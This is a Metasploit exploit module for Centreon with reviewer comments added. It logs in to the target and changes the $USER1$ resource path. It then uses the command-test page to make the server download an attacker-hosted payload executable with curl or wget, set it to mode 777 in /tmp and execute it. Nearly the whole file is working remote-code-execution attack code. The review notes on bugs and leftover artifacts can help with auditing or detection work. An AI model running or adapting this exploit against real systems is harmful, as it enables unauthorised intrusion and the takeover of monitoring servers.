##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
  5.  
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  # HttpClient talks to the Centreon instance; HttpServer::HTML hosts the
  # payload executable the target is told to fetch; EXE generates that file.
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  # Module metadata and user options.
  #
  # NOTE(review): the "Description" is only "rce", and the USERNAME and
  # PASSWORD option descriptions are copy-pasted from TARGETURI. They should
  # state that a valid Centreon login is required: every request after the
  # first GET is made with the authenticated session cookie.
  def initialize(info = {})
    super(update_info(info,
      "Name" => "Centreon RCE",
      "Description" => %q{
rce
      },
      "License" => MSF_LICENSE,
      "Platform" => "linux",
      "Targets" => [
        ["Centreon", {}],
      ],
      "Stance" => Msf::Exploit::Stance::Aggressive,
      "Privileged" => false,
      "DisclosureDate" => "Sep 17 2019",
      "DefaultOptions" => {
        # The payload-hosting server; +primer+ builds a URL without a port,
        # so the default of 80 (443 with SSL) is what that URL relies on.
        "SRVPORT" => 80,
      },
      "DefaultTarget" => 0))

    register_options(
      [
        OptString.new("TARGETURI", [true, "The URI of the Centreon Application", "/centreon"]),
        # Chooses curl or wget for the download command built in +send_payload+.
        OptString.new("METHOD", [true, "Method", "curl"]),
        OptString.new("USERNAME", [true, "The URI of the Centreon Application", "admin"]),
        OptString.new("PASSWORD", [true, "The URI of the Centreon Application", ""]),
        # Upper bound on how long +exploit+ keeps the payload server running.
        OptInt.new("HTTPDELAY", [false, "Number of seconds the web server will wait before termination", 10]),
      ]
    )
  end

  # Fetches the login page, extracts the CSRF token (+centreon_token+) from
  # the HTML and submits USERNAME/PASSWORD. This is not a passive check: it
  # performs a real login against the target and leaves a session behind.
  #
  # @return [Exploit::CheckCode] Appears when the post-login body contains
  #   the SPA marker string, Unknown otherwise.
  #
  # NOTE(review): when no token is found the +if+ has no else branch, so the
  # method returns nil rather than a CheckCode; returning
  # `Exploit::CheckCode::Unknown` there would be the expected contract.
  # NOTE(review): if the GET gets no response, +res+ is nil and +get_cookies+
  # raises; a nil guard is missing here and in +exploit+.
  def check
    res = send_request_cgi(
      "uri" => normalize_uri(target_uri.path, "index.php"),
      "method" => "GET",
    )
    # Session cookie from the first response; reused by every later request.
    @phpsessid = res.get_cookies
    # A regex literal on the left of =~ binds its named capture as the local
    # +token+ (nil when the pattern does not match).
    /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body

    if token
      print_status("Successfully got token #{token}")
      # send_request_cgi! (bang) presumably follows redirects after login -- confirm.
      res = send_request_cgi!(
        "uri" => normalize_uri(target_uri.path, "index.php"),
        "method" => "POST",
        "cookie" => @phpsessid,
        "vars_post" => {
          "useralias" => datastore["USERNAME"],
          "password" => datastore["PASSWORD"],
          "centreon_token" => token,
        },
      )
      if res.body.include? "You need to enable JavaScript to run this app"
        Exploit::CheckCode::Appears
      else
        Exploit::CheckCode::Unknown
      end
    end
  end

  # Full chain, wrapped in one rescue for connection errors:
  #   1. GET  index.php                -> session cookie and CSRF token (as in +check+)
  #   2. POST index.php                -> login with USERNAME/PASSWORD
  #   3. GET  main.get.php p=60904 o=c -> a fresh token and the current value of
  #                                       the $USER1$ resource (+old_path+)
  #   4. POST main.get.php ?p=60904    -> saves $USER1$ with resource_line "/"
  #   5. +super+ under Timeout         -> presumably hands off to the HttpServer
  #                                       mixin, which starts the service and
  #                                       calls +primer+ -- confirm
  #
  # Server-side artifacts of this flow: an authenticated session issuing
  # requests to main.get.php with p=60904, and a modified $USER1$ resource.
  # +@old_path+ is captured in step 3 but never written back anywhere in this
  # class, so the resource change persists on the target after the run.
  #
  # NOTE(review): the Timeout rescue logs "timeout" as both print_good and
  # vprint_error; one of the two is redundant.
  def exploit
    begin
      res = send_request_cgi(
        "uri" => normalize_uri(target_uri.path, "index.php"),
        "method" => "GET",
      )
      @phpsessid = res.get_cookies
      /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body

      if token
        print_status("Successfully got token #{token}")
        res = send_request_cgi!(
          "uri" => normalize_uri(target_uri.path, "index.php"),
          "method" => "POST",
          "cookie" => @phpsessid,
          "vars_post" => {
            "useralias" => datastore["USERNAME"],
            "password" => datastore["PASSWORD"],
            "centreon_token" => token,
          },
        )
        if res.body.include? "You need to enable JavaScript to run this app"
          # Resource edit form for resource_id 1 ($USER1$): yields a new token
          # and the current resource_line value.
          res = send_request_cgi(
            "uri" => normalize_uri(target_uri.path, "main.get.php"),
            "method" => "GET",
            "cookie" => @phpsessid,
            "vars_get" => {
              "p" => "60904",
              "o" => "c",
              "resource_id" => 1,
            },
          )
          /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
          /resource_line\".*value=\"(?<old_path>.*?)\"/ =~ res.body
          # Stored but never used again in this class (see method comment).
          @old_path = old_path
          # NOTE(review): "?p=60904" is passed as a path segment; normalize_uri
          # joins segments with "/", so the resulting URI likely ends in
          # "main.get.php/?p=60904" -- confirm this is what the target expects.
          # The hash below uses "key": (symbol keys) unlike the string keys
          # used elsewhere; the adjacent literals "" "a:0:{}" "" concatenate
          # at parse time to "a:0:{}".
          res = send_request_cgi(
            "uri" => normalize_uri(target_uri.path, "main.get.php", "?p=60904"),
            "method" => "POST",
            "cookie" => @phpsessid,
            "vars_post" => { "resource_name": "$USER1$", "resource_line": "/", "instance_id": 1, "resource_activate": 1, "resource_comment": "Nagios Plugins Path", "submitC": "Save", "resource_id": 1, "o": "c", "initialValues": "" "a:0:{}" "", "centreon_token": token },
          )
          begin
            # Keeps the payload server alive for at most HTTPDELAY seconds.
            Timeout.timeout(datastore["HTTPDELAY"]) { super }
          rescue Timeout::Error
            print_good("timeout")
            vprint_error("timeout")
          end
        else
          vprint_error("Cannot login")
        end
      else
        vprint_error("Couldn't get token")
      end
    rescue ::Rex::ConnectionError
      vprint_error("Connection error")
    end
  end

  # Runs once the payload server is up: generates the executable payload,
  # takes the first registered resource path as the download name, and builds
  # the URL the target is told to fetch (http or https per the SSL option).
  # The URL carries no port, so it only matches the service when SRVPORT is
  # the scheme default.
  def primer
    @pl = generate_payload_exe
    @path = service.resources.keys[0]
    binding_ip = srvhost_addr

    proto = datastore["SSL"] ? "https" : "http"
    payload_uri = "#{proto}://#{binding_ip}/#{@path}"
    send_payload(payload_uri)
  end

  # Registers a command (p=60801, the command test page) whose command_line
  # downloads +payload_uri+ to /tmp/<path> with curl or wget. Server-side this
  # leaves a command entry and a new file under /tmp.
  #
  # @param payload_uri [String] URL of the hosted payload, built by +primer+
  #
  # NOTE(review): the option is registered as "METHOD" but read as
  # datastore["method"]; Metasploit's datastore is case-insensitive, so this
  # presumably resolves -- confirm. The parameters travel in "vars_get" on a
  # POST request, and +res+ is assigned but never inspected.
  def send_payload(payload_uri)
    if datastore["method"] == "curl"
      payload = "/bin/bash -c \"curl #{payload_uri} -o /tmp/#{@path}\""
    else
      payload = "/bin/bash -c \"wget #{payload_uri} -O /tmp/#{@path}\""
    end
    res = send_request_cgi(
      "uri" => normalize_uri(target_uri.path, "main.get.php"),
      "method" => "POST",
      "cookie" => @phpsessid,
      "vars_get" => { "p": "60801", "command_hostaddress": "", "command_example": "", "command_line": payload, "o": "p", "min": 1 },
    )
  end

  # HttpServer callback for the hosted resource: serves the generated payload,
  # then triggers +run_shell+ and shuts the service down.
  #
  # @param cli [Object] client connection handed in by the server mixin
  # @param req [Object] the incoming request; only +uri+ is used here
  def on_request_uri(cli, req)
    print_good("#{peer} - Payload request received: #{req.uri}")
    send_response(cli, @pl)
    run_shell
    stop_service
  end

  # Two more command-test requests against p=60801: the first sets
  # /tmp/<path> to mode 777, the second executes it. A world-writable,
  # world-executable file in /tmp with a random name is the on-host artifact.
  #
  # NOTE(review): both +res+ assignments are unused; neither response is
  # checked for success.
  def run_shell
    res = send_request_cgi(
      "uri" => normalize_uri(target_uri.path, "main.get.php"),
      "method" => "POST",
      "cookie" => @phpsessid,
      "vars_get" => {
        "p": "60801",
        "command_hostaddress": "",
        "command_example": "",
        "command_line": "/bin/bash -c \"chmod 777 /tmp/#{@path}\"",
        "o": "p",
        "min": 1,
      },
    )

    res = send_request_cgi(
      "uri" => normalize_uri(target_uri.path, "main.get.php"),
      "method" => "POST",
      "cookie" => @phpsessid,
      "vars_get" => {
        "p": "60801",
        "command_hostaddress": "",
        "command_example": "",
        "command_line": "/tmp/#{@path}",
        "o": "p",
        "min": 1,
      },
    )
  end
end